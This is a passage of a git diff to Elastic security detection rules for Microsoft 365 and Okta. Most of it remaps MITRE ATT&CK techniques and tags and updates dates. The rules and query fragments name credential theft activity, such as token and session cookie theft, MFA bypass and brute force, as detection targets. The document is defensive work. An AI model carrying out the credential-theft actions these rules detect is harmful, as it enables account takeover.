framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" +[[rule.threat.technique.subtechnique]] +id = "T1114.003" +name = "Email Forwarding Rule" +reference = "https://attack.mitre.org/techniques/T1114/003/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml index ed1b40e8736..ef9c4fa2887 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,7 +68,7 @@ references = [ risk_score = 47 rule_id = "272a6484-2663-46db-a532-ef734bf9a796" severity = "medium" -tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Tactic: Exfiltration", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -79,14 +79,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml index 50995758898..34979e5bdcc 100644 --- a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/24" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,15 +79,7 @@ references = [ risk_score = 47 rule_id = "0c3c80de-08c2-11f0-bd11-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", - "Tactic: Credential Access", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -102,34 +94,16 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml index f97a3f4fe2b..e4b0251791c 100644 --- a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["o365"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ references = [ risk_score = 47 rule_id = "929d0766-204b-11f0-9c1f-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -141,29 +133,31 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml index bf11a1e50c2..6066dad1266 100644 --- a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml +++ b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -75,15 +75,7 @@ references = [ risk_score = 47 rule_id = "2de10e77-c144-4e69-afb7-344e7127abd0" severity = "medium" -tags = [ - "Domain: Identity", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Identity", "Tactic: Credential Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -103,27 +95,21 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1606" +name = "Forge Web Credentials" +reference = "https://attack.mitre.org/techniques/T1606/" +[[rule.threat.technique.subtechnique]] +id = "T1606.002" +name = "SAML Tokens" +reference = "https://attack.mitre.org/techniques/T1606/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.UserId", "o365.audit.ErrorNumber"] diff --git a/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml b/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml index f460f945f23..1515f163b1b 100644 --- a/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml +++ b/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/12" integration = ["o365"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,24 +74,13 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml b/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml index 15f54581589..3caea118249 100644 --- a/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml +++ b/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/15" integration = ["o365"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -77,11 +77,3 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml b/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml index 29d2607f6cb..7f4d3ef8c88 100644 --- a/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml +++ b/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/10" integration = ["o365"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,30 +75,13 @@ event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1080" name = "Taint Shared Content" reference = "https://attack.mitre.org/techniques/T1080/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1608" -name = "Stage Capabilities" -reference = "https://attack.mitre.org/techniques/T1608/" -[[rule.threat.technique.subtechnique]] -id = "T1608.001" -name = "Upload Malware" -reference = "https://attack.mitre.org/techniques/T1608/001/" - - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" - diff --git a/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml b/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml index 68a66be6744..8045ac1ec6b 100644 --- a/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml +++ b/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/10" integration = ["o365"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,30 +74,13 @@ event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePoint [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1080" name = "Taint Shared Content" reference = "https://attack.mitre.org/techniques/T1080/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1608" -name = "Stage Capabilities" -reference = "https://attack.mitre.org/techniques/T1608/" -[[rule.threat.technique.subtechnique]] -id = "T1608.001" -name = "Upload Malware" -reference = "https://attack.mitre.org/techniques/T1608/001/" - - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" - diff --git a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml index 1768e604eac..7320db56d55 100644 --- a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml +++ b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,16 +59,7 @@ references = [ risk_score = 47 rule_id = "88671231-6626-4e1b-abb7-6e361a171fbb" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Domain: Identity", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -87,19 +78,36 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml index 3618f364ed9..dc8eced2b23 100644 --- a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml +++ b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,13 +67,7 @@ references = [ risk_score = 47 rule_id = "98995807-5b09-4e37-8a54-5cae5dc932d7" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -84,18 +78,36 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml index 71b93df4cac..5432108c661 100644 --- a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml +++ b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -73,16 +73,7 @@ references = [ risk_score = 21 rule_id = "0ce6487d-8069-4888-9ddd-61b52490cebc" severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft Exchange", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft Exchange", "Data Source: Microsoft 365 Audit Logs", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -116,22 +107,39 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.002" name = "Additional Email Delegate Permissions" reference = "https://attack.mitre.org/techniques/T1098/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.002" +name = "Additional Email Delegate Permissions" +reference = "https://attack.mitre.org/techniques/T1098/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.UserId"] diff --git a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml index 6b821fb7bfe..c3a951755b8 100644 --- a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml +++ b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -64,13 +64,7 @@ references = [ risk_score = 21 rule_id = "684554fc-0777-47ce-8c9b-3d01f198d7f8" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Microsoft 365", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -83,19 +77,46 @@ event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml index e354d1a2bfa..8d34ebf4f65 100644 --- a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml +++ b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/02" integration = ["o365"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -87,34 +87,36 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml index a7c2689ef36..a138eaf5c54 100644 --- a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml +++ b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,12 +65,7 @@ references = [ risk_score = 73 rule_id = "3805c3dc-f82c-4f8d-891e-63c24d3102b0" severity = "high" -tags = [ - "Data Source: Okta", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Okta", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -81,14 +76,36 @@ event.dataset:okta.system and event.action:user.mfa.attempt_bypass [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1111" -name = "Multi-Factor Authentication Interception" -reference = "https://attack.mitre.org/techniques/T1111/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml index 0c7a8ec869e..fb5b188fca0 100644 --- a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml +++ b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] @@ -79,17 +79,21 @@ event.dataset:okta.system and event.action:user.account.lock [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["okta.actor.alternate_id"] value = 3 diff --git a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml index 032c715eb49..607e0c6f2f3 100644 --- a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml +++ b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/10" integration = ["okta"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,32 +92,16 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.004" -name = "Credential Stuffing" -reference = "https://attack.mitre.org/techniques/T1110/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["okta.debug_context.debug_data.dt_hash"] value = 1 diff --git a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml index 03486d8b6ad..f68c3fed768 100644 --- a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml +++ b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/08" integration = ["okta"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,13 +66,7 @@ setup = """## Setup The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.""" severity = "medium" -tags = [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Domain: SaaS", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Okta", "Domain: SaaS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -107,14 +101,31 @@ from logs-okta* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1539" name = "Steal Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1539/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml index 208243ef930..aaf6412175c 100644 --- a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml +++ b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/22" integration = 